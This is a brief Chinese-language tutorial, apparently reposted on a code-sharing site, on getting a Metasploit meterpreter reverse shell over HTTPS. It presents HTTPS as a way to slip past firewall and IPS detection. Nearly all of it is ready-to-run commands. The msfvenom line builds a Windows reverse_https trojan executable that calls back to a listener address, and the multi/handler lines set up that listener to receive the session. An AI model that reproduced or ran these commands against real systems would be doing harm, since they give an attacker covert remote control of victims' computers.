MSF反弹meterpreter会话(使用https协议回连)


如果反弹的shell用明文(如http)传输控制指令,那么很容易被防火墙、IPS等设备检测出来从而中断TCP连接。因此使用https协议进行回连就能避免这些问题。

第一步:生成木马客户端

msfvenom -p windows/x64/meterpreter_reverse_https -f exe -o /tmp/reverse_https.exe LHOST=192.168.106.10 LPORT=8443

第二步:启动MSF等待回连

use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_https
set LHOST 192.168.106.10
set LPORT 8443
run

第三步:运行木马客户端即可在MSF控制台获取meterpreter会话。


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM